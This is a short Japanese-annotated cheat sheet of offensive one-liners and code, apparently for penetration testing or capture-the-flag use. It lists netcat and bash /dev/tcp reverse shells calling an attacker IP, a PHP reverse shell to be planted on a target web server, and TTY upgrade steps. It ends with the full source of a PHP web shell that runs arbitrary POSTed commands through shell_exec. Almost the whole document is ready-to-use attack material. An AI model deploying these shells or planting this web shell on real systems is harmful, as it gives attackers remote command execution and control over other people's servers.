//netcat
nc -lvnp 4444 #linux待ち受け
nc <target IP> 4444 -e /bin/bash #linux接続
nc64.exe -v <attacker IP> 4444 -e cmd.exe #windows接続

//bash
bash -i>& /dev/tcp/<IP>/<port> 0>&1
bash -c 'bash -i>& /dev/tcp/<IP>/<port> 0>&1' #標準のシェルが何かわからないとき

//php shell
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/<IP>/4444 0>&1'"); #phpファイルにしてターゲットのＷｅｂサーバに配置
python -m http.server 4444 #待ち受け

//pythonでシェルのアップグレード
python3 -c "import pty;pty.spawn('/bin/bash')" #このあとバックグラウンドにおとす
export TERM=xterm #clearなどが使えるように
stty raw -echo; fg #完了

//最強のWebシェル
<?php
session_start();

$rpath1 = [" ./", " .\\"];
$rpath2 = [" ../", " ..\\"];

if ($_POST["cmd"]) {
    $cmd= $_POST["cmd"];
    //相対パスの置き換え
    $cmd = str_replace ($rpath1, " ".trim($_SESSION["path"])."\\", $cmd);
    $cmd = str_replace ($rpath2, " ".trim($_SESSION["path"])."\\..\\", $cmd);
    $cmd = str_replace (":\\\\", ":\\", $cmd);
    if ($_POST["cmd"] === "session_reset") {
        //session_resetと入力することでリセットする
        $_SESSION = [];
    } elseif (preg_match("/^cd\s/i", $_POST["cmd"])) {
        // cd コマンドでカレントディレクトリを更新
        $_SESSION["history"] .= $_SESSION["path"]."<br>>".$_POST["cmd"]."<br>";
        $_SESSION["path"] = shell_exec($cmd." & @cd");
    } else {
        $_SESSION["history"] .= $_SESSION["path"]."<br>>".$_POST["cmd"]."<br><pre>".htmlspecialchars(mb_convert_encoding(shell_exec($cmd), "UTF-8"), ENT_QUOTES, "UTF-8", true)."</pre>";
    }
}
?>
<!DOCTYPE html>
<html lang="ja">
<head>
    <meta charset="UTF-8">
    <title>WebShell</title>
    <style>
    *{
        color: #00ff00;
        font-size: 15px;
        font-family: Hack, monospace;
    }
    body{
        background-color: #000000;
    }
    input{
        border: 0px;
        background-color: transparent;
    }
    </style>
</head>
<body>
    <?php 
        if (empty($_SESSION["history"])) $_SESSION["history"] = "";
        if (empty($_SESSION["path"])) $_SESSION["path"] = shell_exec("@cd");
        echo $_SESSION["history"];    
        echo $_SESSION["path"] 
    ?>
    <form method="POST">
        ><input autofocus type="text" name="cmd">
    </form>
</body>
</html>
